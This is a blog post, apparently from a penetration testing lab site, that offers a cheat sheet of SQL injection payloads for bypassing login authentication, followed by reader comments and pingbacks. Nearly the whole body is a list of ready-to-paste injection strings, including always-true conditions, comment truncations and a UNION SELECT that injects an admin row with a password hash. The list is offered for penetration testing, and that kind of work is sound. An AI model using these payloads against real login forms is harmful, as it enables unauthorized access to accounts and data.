SQL Injection Authentication Bypass Cheat Sheet | Penetration Testing Lab

SQL Injection Authentication Bypass Cheat Sheet

December 24, 2012

Administrator General Lab Notes Authentication Bypass, OWASP, penetration test, SQL Injection 13 Comments

This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Advertisements

13 Comments (+add yours?)

Yaopointcom
Dec 27, 2012 @ 14:22:22

Thanks a lot mate for the hard work .

Reply
Ialle Ironbits (@Iall3)
Jan 06, 2013 @ 20:48:08

great jobs, thanks you !!!

Reply
Mr Bou3o
Jan 09, 2013 @ 16:16:30

Hello, thank you netbiosX 🙂

Could you tell me what’s the difference between all these ways ?

if there is a break in the website or application, somme ways could success and others not ??!!

Thank you.

Reply
Authentication Bypass | Official @bugcrowd BlogOfficial @bugcrowd Blog
Aug 20, 2013 @ 04:53:52
Ashutosh Yadav
Oct 18, 2013 @ 06:40:37

great job

Reply
PicoCTF 2013 – Injection | dook's Blog
Feb 02, 2015 @ 06:53:11
ehtesham
Nov 07, 2016 @ 07:28:05

how to use ??

Reply
HackDay CTF 2016 (Albania) – N13manT
Nov 29, 2016 @ 13:38:04
Root-me – Web-Server : “SQL injection – authentication” – Sam's Security Blog
Jun 11, 2017 @ 02:31:08
aranisec
Sep 08, 2017 @ 04:48:55

Nice list thanks for sharing

Reply
northamlab
May 02, 2018 @ 07:08:13

Great post! Thanks for the post.Keep sharing.

Reply
Magento SQL Injection. How to Secure your Magento Store against SQLi
Oct 23, 2018 @ 12:37:12
OWASP Mutillidae II SQLi | Igor Garofano blog
Jun 22, 2019 @ 19:43:08

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Google account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Connecting to %s

Advertisements

%d bloggers like this: